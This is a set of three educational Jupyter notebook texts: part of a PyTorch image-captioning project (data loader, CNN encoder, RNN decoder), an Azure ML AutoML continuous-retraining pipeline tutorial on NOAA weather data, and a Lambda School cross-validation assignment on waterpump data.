There are also a few special keys in the `word2idx` dictionary. You are already familiar with the special start word (`"<start>"`) and special end word (`"<end>"`). There is one more special token, corresponding to unknown words (`"<unk>"`). All tokens that don't appear anywhere in the `word2idx` dictionary are considered unknown words. In the pre-processing step, any unknown tokens are mapped to the integer `2`.
```
unk_word = data_loader.dataset.vocab.unk_word
print('Special unknown word:', unk_word)
print('All unknown words are mapped to this integer:', data_loader.dataset.vocab(unk_word))
```
Check this for yourself below, by pre-processing the provided nonsense words that never appear in the training captions.
```
print(data_loader.dataset.vocab('jfkafejw'))
print(data_loader.dataset.vocab('ieowoqjf'))
```
The final thing to mention is the `vocab_from_file` argument that is supplied when creating a data loader. To understand this argument, note that when you create a new data loader, the vocabulary (`data_loader.dataset.vocab`) is saved as a [pickle](https://docs.python.org/3/library/pickle.html) file in the project folder, with filename `vocab.pkl`.
If you are still tweaking the value of the `vocab_threshold` argument, you **must** set `vocab_from_file=False` to have your changes take effect.
But once you are happy with the value that you have chosen for the `vocab_threshold` argument, you need only run the data loader *one more time* with your chosen `vocab_threshold` to save the new vocabulary to file. Then, you can henceforth set `vocab_from_file=True` to load the vocabulary from file and speed the instantiation of the data loader. Note that building the vocabulary from scratch is the most time-consuming part of instantiating the data loader, and so you are strongly encouraged to set `vocab_from_file=True` as soon as you are able.
Note that if `vocab_from_file=True`, then any supplied argument for `vocab_threshold` when instantiating the data loader is completely ignored.
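The round trip through `vocab.pkl` amounts to ordinary `pickle` usage. A minimal sketch with a toy dictionary and a temporary file (not the project's actual `vocab.pkl`):

```python
import os
import pickle
import tempfile

vocab = {'<start>': 0, '<end>': 1, '<unk>': 2, 'a': 3}   # toy stand-in

path = os.path.join(tempfile.mkdtemp(), 'vocab.pkl')
with open(path, 'wb') as f:      # roughly what vocab_from_file=False writes out
    pickle.dump(vocab, f)
with open(path, 'rb') as f:      # roughly what vocab_from_file=True reads back
    loaded = pickle.load(f)

print(loaded == vocab)  # True
```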
```
# Obtain the data loader (from file). Note that it runs much faster than before!
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_from_file=True)
```
In the next section, you will learn how to use the data loader to obtain batches of training data.
<a id='step2'></a>
## Step 2: Use the Data Loader to Obtain Batches
The captions in the dataset vary greatly in length. You can see this by examining `data_loader.dataset.caption_lengths`, a Python list with one entry for each training caption (where the value stores the length of the corresponding caption).
In the code cell below, we use this list to print the total number of captions in the training data with each length. As you will see below, the majority of captions have length 10. Likewise, very short and very long captions are quite rare.
```
from collections import Counter
# Tally the total number of training captions with each length.
counter = Counter(data_loader.dataset.caption_lengths)
lengths = sorted(counter.items(), key=lambda pair: pair[1], reverse=True)
for value, count in lengths:
print('value: %2d --- count: %5d' % (value, count))
```
To generate batches of training data, we begin by first sampling a caption length (where the probability that any length is drawn is proportional to the number of captions with that length in the dataset). Then, we retrieve a batch of size `batch_size` of image-caption pairs, where all captions have the sampled length. This approach for assembling batches matches the procedure in [this paper](https://arxiv.org/pdf/1502.03044.pdf) and has been shown to be computationally efficient without degrading performance.
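The sampling scheme can be sketched without the project code: drawing an element uniformly from the list of caption lengths is automatically proportional to each length's frequency, and a batch is then drawn from the captions of exactly that length. All values below are toy data.

```python
import numpy as np

# Toy caption lengths standing in for data_loader.dataset.caption_lengths
caption_lengths = [10, 10, 10, 10, 11, 11, 9, 10, 11, 9]
batch_size = 3
rng = np.random.default_rng(0)

# A uniform draw from the list is proportional to each length's frequency
length = rng.choice(caption_lengths)
# Then sample batch_size indices among captions of exactly that length
pool = np.flatnonzero(np.array(caption_lengths) == length)
indices = rng.choice(pool, size=batch_size, replace=True)

print(all(caption_lengths[i] == length for i in indices))  # True
```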
Run the code cell below to generate a batch. The `get_train_indices` method in the `CoCoDataset` class first samples a caption length, and then samples `batch_size` indices corresponding to training data points with captions of that length. These indices are stored below in `indices`.
These indices are supplied to the data loader, which then is used to retrieve the corresponding data points. The pre-processed images and captions in the batch are stored in `images` and `captions`.
```
import numpy as np
import torch.utils.data as data
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader.dataset.get_train_indices()
print('sampled indices:', indices)
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader))
print('images.shape:', images.shape)
print('captions.shape:', captions.shape)
# (Optional) Uncomment the lines of code below to print the pre-processed images and captions.
# print('images:', images)
# print('captions:', captions)
```
Each time you run the code cell above, a different caption length is sampled, and a different batch of training data is returned. Run the code cell multiple times to check this out!
You will train your model in the next notebook in this sequence (**2_Training.ipynb**). This code for generating training batches will be provided to you.
> Before moving to the next notebook in the sequence (**2_Training.ipynb**), you are strongly encouraged to take the time to become very familiar with the code in **data_loader.py** and **vocabulary.py**. **Step 1** and **Step 2** of this notebook are designed to help facilitate a basic introduction and guide your understanding. However, our description is not exhaustive, and it is up to you (as part of the project) to learn how to best utilize these files to complete the project. __You should NOT amend any of the code in either *data_loader.py* or *vocabulary.py*.__
In the next steps, we focus on learning how to specify a CNN-RNN architecture in PyTorch, towards the goal of image captioning.
<a id='step3'></a>
## Step 3: Experiment with the CNN Encoder
Run the code cell below to import `EncoderCNN` and `DecoderRNN` from **model.py**.
```
# Watch for any changes in model.py, and re-load it automatically.
%load_ext autoreload
%autoreload 2
# Import EncoderCNN and DecoderRNN.
from model import EncoderCNN, DecoderRNN
```
In the next code cell we define a `device` that you will use to move PyTorch tensors to the GPU (if CUDA is available). Run this code cell before continuing.
```
import torch

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
```
Run the code cell below to instantiate the CNN encoder in `encoder`.
The pre-processed images from the batch in **Step 2** of this notebook are then passed through the encoder, and the output is stored in `features`.
```
# Specify the dimensionality of the image embedding.
embed_size = 256
#-#-#-# Do NOT modify the code below this line. #-#-#-#
# Initialize the encoder. (Optional: Add additional arguments if necessary.)
encoder = EncoderCNN(embed_size)
# Move the encoder to GPU if CUDA is available.
encoder.to(device)
# Move last batch of images (from Step 2) to GPU if CUDA is available.
images = images.to(device)
# Pass the images through the encoder.
features = encoder(images)
print('type(features):', type(features))
print('features.shape:', features.shape)
# Check that your encoder satisfies some requirements of the project! :D
assert type(features)==torch.Tensor, "Encoder output needs to be a PyTorch Tensor."
assert (features.shape[0]==batch_size) & (features.shape[1]==embed_size), "The shape of the encoder output is incorrect."
```
The encoder that we provide to you uses the pre-trained ResNet-50 architecture (with the final fully-connected layer removed) to extract features from a batch of pre-processed images. The output is then flattened to a vector, before being passed through a `Linear` layer to transform the feature vector to have the same size as the word embedding.

You are welcome (and encouraged) to amend the encoder in **model.py**, to experiment with other architectures. In particular, consider using a [different pre-trained model architecture](http://pytorch.org/docs/master/torchvision/models.html). You may also like to [add batch normalization](http://pytorch.org/docs/master/nn.html#normalization-layers).
> You are **not** required to change anything about the encoder.
For this project, you **must** incorporate a pre-trained CNN into your encoder. Your `EncoderCNN` class must take `embed_size` as an input argument, which will also correspond to the dimensionality of the input to the RNN decoder that you will implement in Step 4. When you train your model in the next notebook in this sequence (**2_Training.ipynb**), you are welcome to tweak the value of `embed_size`.
If you decide to modify the `EncoderCNN` class, save **model.py** and re-execute the code cell above. If the code cell returns an assertion error, then please follow the instructions to modify your code before proceeding. The assert statements ensure that `features` is a PyTorch tensor with shape `[batch_size, embed_size]`.
<a id='step4'></a>
## Step 4: Implement the RNN Decoder
Before executing the next code cell, you must write `__init__` and `forward` methods in the `DecoderRNN` class in **model.py**. (Do **not** write the `sample` method yet - you will work with this method when you reach **3_Inference.ipynb**.)
> The `__init__` and `forward` methods in the `DecoderRNN` class are the only things that you **need** to modify as part of this notebook. You will write more implementations in the notebooks that appear later in the sequence.
Your decoder will be an instance of the `DecoderRNN` class and must accept as input:
- the PyTorch tensor `features` containing the embedded image features (outputted in Step 3, when the last batch of images from Step 2 was passed through `encoder`), along with
- a PyTorch tensor corresponding to the last batch of captions (`captions`) from Step 2.
Note that the way we have written the data loader should simplify your code a bit. In particular, every training batch will contain pre-processed captions where all have the same length (`captions.shape[1]`), so **you do not need to worry about padding**.
> While you are encouraged to implement the decoder described in [this paper](https://arxiv.org/pdf/1411.4555.pdf), you are welcome to implement any architecture of your choosing, as long as it uses at least one RNN layer, with hidden dimension `hidden_size`.
Although you will test the decoder using the last batch that is currently stored in the notebook, your decoder should be written to accept an arbitrary batch (of embedded image features and pre-processed captions [where all captions have the same length]) as input.

In the code cell below, `outputs` should be a PyTorch tensor with size `[batch_size, captions.shape[1], vocab_size]`. Your output should be designed such that `outputs[i,j,k]` contains the model's predicted score, indicating how likely the `j`-th token in the `i`-th caption in the batch is the `k`-th token in the vocabulary. In the next notebook of the sequence (**2_Training.ipynb**), we provide code to supply these scores to the [`torch.nn.CrossEntropyLoss`](http://pytorch.org/docs/master/nn.html#torch.nn.CrossEntropyLoss) loss function in PyTorch.
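One possible implementation satisfying this specification — a single-layer LSTM in the spirit of the Show-and-Tell paper, offered here as a hedged sketch rather than the required solution — might look like:

```python
import torch
import torch.nn as nn

class DecoderRNN(nn.Module):
    # Sketch: embed the caption tokens, prepend the image feature vector as
    # the first time step, and run an LSTM followed by a vocabulary projection.
    def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
        super().__init__()
        self.embedding = nn.Embedding(vocab_size, embed_size)
        self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True)
        self.fc = nn.Linear(hidden_size, vocab_size)

    def forward(self, features, captions):
        # Drop the final caption token; the image feature takes step 0,
        # so the output length still equals captions.shape[1].
        embeddings = self.embedding(captions[:, :-1])
        inputs = torch.cat((features.unsqueeze(1), embeddings), dim=1)
        hiddens, _ = self.lstm(inputs)
        return self.fc(hiddens)  # [batch_size, captions.shape[1], vocab_size]
```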
```
# Specify the number of features in the hidden state of the RNN decoder.
hidden_size = 512
#-#-#-# Do NOT modify the code below this line. #-#-#-#
# Store the size of the vocabulary.
vocab_size = len(data_loader.dataset.vocab)
# Initialize the decoder.
decoder = DecoderRNN(embed_size, hidden_size, vocab_size)
# Move the decoder to GPU if CUDA is available.
decoder.to(device)
# Move last batch of captions (from Step 1) to GPU if CUDA is available
captions = captions.to(device)
# Pass the encoder output and captions through the decoder.
outputs = decoder(features, captions)
print('type(outputs):', type(outputs))
print('outputs.shape:', outputs.shape)
# Check that your decoder satisfies some requirements of the project! :D
assert type(outputs)==torch.Tensor, "Decoder output needs to be a PyTorch Tensor."
assert (outputs.shape[0]==batch_size) & (outputs.shape[1]==captions.shape[1]) & (outputs.shape[2]==vocab_size), "The shape of the decoder output is incorrect."
```
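For reference, scores of shape `[batch_size, captions.shape[1], vocab_size]` can be supplied to `torch.nn.CrossEntropyLoss` by flattening the batch and time dimensions together. This is a sketch with made-up shapes; the training notebook provides the actual code:

```python
import torch
import torch.nn as nn

# Hypothetical shapes standing in for the decoder output and caption batch.
batch_size, seq_len, vocab_size = 4, 6, 20
outputs = torch.randn(batch_size, seq_len, vocab_size)      # decoder scores
captions = torch.randint(0, vocab_size, (batch_size, seq_len))  # token ids

# CrossEntropyLoss expects [N, C] scores and [N] targets, so merge the
# batch and time dimensions before computing the loss.
criterion = nn.CrossEntropyLoss()
loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
print(loss.item())
```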
When you train your model in the next notebook in this sequence (**2_Training.ipynb**), you are welcome to tweak the value of `hidden_size`.
---
# Automated Machine Learning
**Continuous retraining using Pipelines and Time-Series TabularDataset**
## Contents
1. [Introduction](#Introduction)
2. [Setup](#Setup)
3. [Compute](#Compute)
4. [Run Configuration](#Run-Configuration)
5. [Data Ingestion Pipeline](#Data-Ingestion-Pipeline)
6. [Training Pipeline](#Training-Pipeline)
7. [Publish Retraining Pipeline and Schedule](#Publish-Retraining-Pipeline-and-Schedule)
8. [Test Retraining](#Test-Retraining)
## Introduction
In this example we use AutoML and Pipelines to enable continuous retraining of a model based on updates to the training dataset. We will create two pipelines: the first demonstrates a training dataset that gets updated over time, leveraging the time-series capabilities of `TabularDataset`; the second uses a pipeline `Schedule` to trigger continuous retraining.
Make sure you have executed the [configuration notebook](../../../configuration.ipynb) before running this notebook.
In this notebook you will learn how to:
* Create an Experiment in an existing Workspace.
* Configure AutoML using AutoMLConfig.
* Create data ingestion pipeline to update a time-series based TabularDataset
* Create training pipeline to prepare data, run AutoML, register the model and setup pipeline triggers.
## Setup
As part of the setup you have already created an Azure ML `Workspace` object. For AutoML you will need to create an `Experiment` object, which is a named object in a `Workspace` used to run experiments.
```
import logging
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import datasets
import azureml.core
from azureml.core.experiment import Experiment
from azureml.core.workspace import Workspace
from azureml.train.automl import AutoMLConfig
```
This sample notebook may use features that are not available in previous versions of the Azure ML SDK.
Accessing the Azure ML workspace requires authentication with Azure.
The default authentication is interactive authentication using the default tenant. Executing the `ws = Workspace.from_config()` line in the cell below will prompt for authentication the first time that it is run.
If you have multiple Azure tenants, you can specify the tenant by replacing the `ws = Workspace.from_config()` line in the cell below with the following:
```
from azureml.core.authentication import InteractiveLoginAuthentication
auth = InteractiveLoginAuthentication(tenant_id = 'mytenantid')
ws = Workspace.from_config(auth = auth)
```
If you need to run in an environment where interactive login is not possible, you can use Service Principal authentication by replacing the `ws = Workspace.from_config()` line in the cell below with the following:
```
from azureml.core.authentication import ServicePrincipalAuthentication
auth = ServicePrincipalAuthentication('mytenantid', 'myappid', 'mypassword')
ws = Workspace.from_config(auth = auth)
```
For more details, see aka.ms/aml-notebook-auth
```
ws = Workspace.from_config()
dstor = ws.get_default_datastore()
# Choose a name for the run history container in the workspace.
experiment_name = "retrain-noaaweather"
experiment = Experiment(ws, experiment_name)
output = {}
output["Subscription ID"] = ws.subscription_id
output["Workspace"] = ws.name
output["Resource Group"] = ws.resource_group
output["Location"] = ws.location
output["Run History Name"] = experiment_name
pd.set_option("display.max_colwidth", None)
outputDf = pd.DataFrame(data=output, index=[""])
outputDf.T
```
## Compute
#### Create or Attach existing AmlCompute
You will need to create a compute target for your AutoML run. In this tutorial, you create AmlCompute as your training compute resource.
> Note that if you have an AzureML Data Scientist role, you will not have permission to create compute resources. Talk to your workspace or IT admin to create the compute targets described in this section, if they do not already exist.
#### Creation of AmlCompute takes approximately 5 minutes.
If the AmlCompute with that name is already in your workspace this code will skip the creation process.
As with other Azure services, there are limits on certain resources (e.g. AmlCompute) associated with the Azure Machine Learning service. Please read [this article](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-manage-quotas) on the default limits and how to request more quota.
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Choose a name for your CPU cluster
amlcompute_cluster_name = "cont-cluster"
# Verify that cluster does not exist already
try:
compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
print("Found existing cluster, use it.")
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(
vm_size="STANDARD_DS12_V2", max_nodes=4
)
compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
compute_target.wait_for_completion(show_output=True)
```
## Run Configuration
```
from azureml.core.runconfig import CondaDependencies, RunConfiguration
# create a new RunConfig object
conda_run_config = RunConfiguration(framework="python")
# Set compute target to AmlCompute
conda_run_config.target = compute_target
conda_run_config.environment.docker.enabled = True
cd = CondaDependencies.create(
pip_packages=[
"azureml-sdk[automl]",
"applicationinsights",
"azureml-opendatasets",
"azureml-defaults",
],
conda_packages=["numpy==1.16.2"],
pin_sdk_version=False,
)
conda_run_config.environment.python.conda_dependencies = cd
print("run config is ready")
```
## Data Ingestion Pipeline
For this demo, we will use NOAA weather data from [Azure Open Datasets](https://azure.microsoft.com/services/open-datasets/). You can replace this with your own dataset, or you can skip this pipeline if you already have a time-series based `TabularDataset`.
```
# The name and target column of the Dataset to create
dataset = "NOAA-Weather-DS4"
target_column_name = "temperature"
```
### Upload Data Step
The data ingestion pipeline has a single step with a script to query the latest weather data and upload it to the blob store. During the first run, the script will create and register a time-series based `TabularDataset` with the past one week of weather data. For each subsequent run, the script will create a partition in the blob store by querying NOAA for new weather data since the last modified time of the dataset (`dataset.data_changed_time`) and creating a data.csv file.
```
from azureml.pipeline.core import Pipeline, PipelineParameter
from azureml.pipeline.steps import PythonScriptStep
ds_name = PipelineParameter(name="ds_name", default_value=dataset)
upload_data_step = PythonScriptStep(
script_name="upload_weather_data.py",
allow_reuse=False,
name="upload_weather_data",
arguments=["--ds_name", ds_name],
compute_target=compute_target,
runconfig=conda_run_config,
)
```
### Submit Pipeline Run
```
data_pipeline = Pipeline(
description="pipeline_with_uploaddata", workspace=ws, steps=[upload_data_step]
)
data_pipeline_run = experiment.submit(
data_pipeline, pipeline_parameters={"ds_name": dataset}
)
data_pipeline_run.wait_for_completion(show_output=False)
```
## Training Pipeline
### Prepare Training Data Step
This step runs a script that checks whether new data has arrived since the model was last trained; if no new data is available, it cancels the remaining pipeline steps. We set the `allow_reuse` flag to False so the step runs even when its inputs don't change, and we pass the model name so the script can look up when the model was last trained.
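The core of that check can be sketched in plain Python. This is a hypothetical helper, not the actual `check_data.py`; the real script compares the dataset's `data_changed_time` against the registered model's creation time:

```python
from datetime import datetime, timezone

def should_retrain(dataset_modified_time, model_created_time):
    """Retrain if no model exists yet, or if the data changed after training."""
    if model_created_time is None:
        return True  # no registered model: always train
    return dataset_modified_time > model_created_time

# Data updated after the last training run -> retrain.
print(should_retrain(datetime(2021, 1, 2, tzinfo=timezone.utc),
                     datetime(2021, 1, 1, tzinfo=timezone.utc)))
```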
```
from azureml.pipeline.core import PipelineData
# The model name with which to register the trained model in the workspace.
model_name = PipelineParameter("model_name", default_value="noaaweatherds")
data_prep_step = PythonScriptStep(
script_name="check_data.py",
allow_reuse=False,
name="check_data",
arguments=["--ds_name", ds_name, "--model_name", model_name],
compute_target=compute_target,
runconfig=conda_run_config,
)
from azureml.core import Dataset
train_ds = Dataset.get_by_name(ws, dataset)
train_ds = train_ds.drop_columns(["partition_date"])
```
### AutoMLStep
Create an AutoMLConfig and a training step.
```
from azureml.train.automl import AutoMLConfig
from azureml.pipeline.steps import AutoMLStep
automl_settings = {
"iteration_timeout_minutes": 10,
"experiment_timeout_hours": 0.25,
"n_cross_validations": 3,
"primary_metric": "r2_score",
"max_concurrent_iterations": 3,
"max_cores_per_iteration": -1,
"verbosity": logging.INFO,
"enable_early_stopping": True,
}
automl_config = AutoMLConfig(
task="regression",
debug_log="automl_errors.log",
path=".",
compute_target=compute_target,
training_data=train_ds,
label_column_name=target_column_name,
**automl_settings,
)
from azureml.pipeline.core import PipelineData, TrainingOutput
metrics_output_name = "metrics_output"
best_model_output_name = "best_model_output"
metrics_data = PipelineData(
name="metrics_data",
datastore=dstor,
pipeline_output_name=metrics_output_name,
training_output=TrainingOutput(type="Metrics"),
)
model_data = PipelineData(
name="model_data",
datastore=dstor,
pipeline_output_name=best_model_output_name,
training_output=TrainingOutput(type="Model"),
)
automl_step = AutoMLStep(
name="automl_module",
automl_config=automl_config,
outputs=[metrics_data, model_data],
allow_reuse=False,
)
```
### Register Model Step
Script to register the model to the workspace.
```
register_model_step = PythonScriptStep(
script_name="register_model.py",
name="register_model",
allow_reuse=False,
arguments=[
"--model_name",
model_name,
"--model_path",
model_data,
"--ds_name",
ds_name,
],
inputs=[model_data],
compute_target=compute_target,
runconfig=conda_run_config,
)
```
### Submit Pipeline Run
```
training_pipeline = Pipeline(
description="training_pipeline",
workspace=ws,
steps=[data_prep_step, automl_step, register_model_step],
)
training_pipeline_run = experiment.submit(
training_pipeline,
pipeline_parameters={"ds_name": dataset, "model_name": "noaaweatherds"},
)
training_pipeline_run.wait_for_completion(show_output=False)
```
## Publish Retraining Pipeline and Schedule
Once we are happy with the pipeline, we can publish the training pipeline to the workspace and create a schedule to trigger on blob change. The schedule polls the blob store where the data is being uploaded and runs the retraining pipeline if there is a data change. A new version of the model will be registered to the workspace once the run is complete.
```
pipeline_name = "Retraining-Pipeline-NOAAWeather"
published_pipeline = training_pipeline.publish(
name=pipeline_name, description="Pipeline that retrains AutoML model"
)
published_pipeline
from azureml.pipeline.core import Schedule
schedule = Schedule.create(
workspace=ws,
name="RetrainingSchedule",
pipeline_parameters={"ds_name": dataset, "model_name": "noaaweatherds"},
pipeline_id=published_pipeline.id,
experiment_name=experiment_name,
datastore=dstor,
wait_for_provisioning=True,
polling_interval=1440,
)
```
## Test Retraining
Here we setup the data ingestion pipeline to run on a schedule, to verify that the retraining pipeline runs as expected.
Note:
* Azure NOAA Weather data is updated daily and retraining will not trigger if there is no new data available.
* Depending on the polling interval set in the schedule, the retraining may take some time to trigger after the data ingestion pipeline completes.
```
pipeline_name = "DataIngestion-Pipeline-NOAAWeather"
published_pipeline = data_pipeline.publish(
name=pipeline_name, description="Pipeline that updates NOAAWeather Dataset"
)
published_pipeline
from azureml.pipeline.core import Schedule
schedule = Schedule.create(
workspace=ws,
name="RetrainingSchedule-DataIngestion",
pipeline_parameters={"ds_name": dataset},
pipeline_id=published_pipeline.id,
experiment_name=experiment_name,
datastore=dstor,
wait_for_provisioning=True,
polling_interval=1440,
)
```
---
<a href="https://colab.research.google.com/github/pingao2019/DS-Unit-2-Kaggle-Challenge/blob/master/h3Copy_of_LS_DS_223_assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
Lambda School Data Science
*Unit 2, Sprint 2, Module 3*
---
# Cross-Validation
## Assignment
- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Continue to participate in our Kaggle challenge.
- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
- [ ] Commit your notebook to your fork of the GitHub repo.
You won't be able to just copy from the lesson notebook to this assignment.
- Because the lesson was ***regression***, but the assignment is ***classification.***
- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
So you will have to adapt the example, which is good real-world practice.
1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
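Putting points 1–4 together, a minimal self-contained sketch (on synthetic data rather than the waterpumps dataset) could look like this; note that `make_pipeline` lowercases class names when building parameter keys:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from sklearn.model_selection import RandomizedSearchCV
from sklearn.pipeline import make_pipeline

# Small synthetic multi-class problem standing in for the real dataset.
X, y = make_classification(n_samples=200, n_features=8, n_classes=3,
                           n_informative=5, random_state=42)

pipeline = make_pipeline(SimpleImputer(), RandomForestClassifier(random_state=42))
param_distributions = {
    'simpleimputer__strategy': ['mean', 'median'],
    'randomforestclassifier__max_depth': [5, 10, 20],
    'randomforestclassifier__min_samples_leaf': [1, 3, 5],
}
search = RandomizedSearchCV(pipeline, param_distributions, n_iter=5, cv=3,
                            scoring='accuracy', random_state=42)
search.fit(X, y)
print('Best CV accuracy:', search.best_score_)
```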
## Stretch Goals
### Reading
- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
### Doing
- Add your own stretch goals!
- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
- In addition to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
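A compact version of that idea, using the iris dataset rather than the book's exact example: the pipeline step itself becomes a hyperparameter by listing alternative estimators in the param grid.

```python
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.svm import SVC

X, y = load_iris(return_X_y=True)
pipe = Pipeline([('scaler', StandardScaler()), ('clf', SVC())])

# Each dict searches a different model, with its own scaler options and
# hyperparameters; 'passthrough' skips the scaling step entirely.
param_grid = [
    {'clf': [SVC()], 'scaler': [StandardScaler(), MinMaxScaler()],
     'clf__C': [0.1, 1, 10]},
    {'clf': [RandomForestClassifier(random_state=0)], 'scaler': ['passthrough'],
     'clf__max_depth': [3, 5]},
]
grid = GridSearchCV(pipe, param_grid, cv=3)
grid.fit(X, y)
print('Best model:', type(grid.best_params_['clf']).__name__)
```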
### BONUS: Stacking!
Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
```python
import pandas as pd
# Filenames of your submissions you want to ensemble
files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
target = 'status_group'
submissions = (pd.read_csv(file)[[target]] for file in files)
ensemble = pd.concat(submissions, axis='columns')
majority_vote = ensemble.mode(axis='columns')[0]
sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission[target] = majority_vote
submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
```
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
# Split train into train & val
train, val = train_test_split(train, train_size=0.80, test_size=0.20,
stratify=train['status_group'], random_state=42)
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
# Also create a "missing indicator" column, because the fact that
# values are missing may be a predictive signal.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Drop duplicate columns
duplicates = ['quantity_group', 'payment_type']
X = X.drop(columns=duplicates)
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# return the wrangled dataframe
return X
train = wrangle(train)
val = wrangle(val)
test = wrangle(test)
# The status_group column is the target
target = 'status_group'
# Get a dataframe with all train columns except the target
train_features = train.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features with cardinality <= 50
categorical_features = cardinality[cardinality <= 50].index.tolist()
# Combine the lists
features = numeric_features + categorical_features
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
X_test = test[features]
```
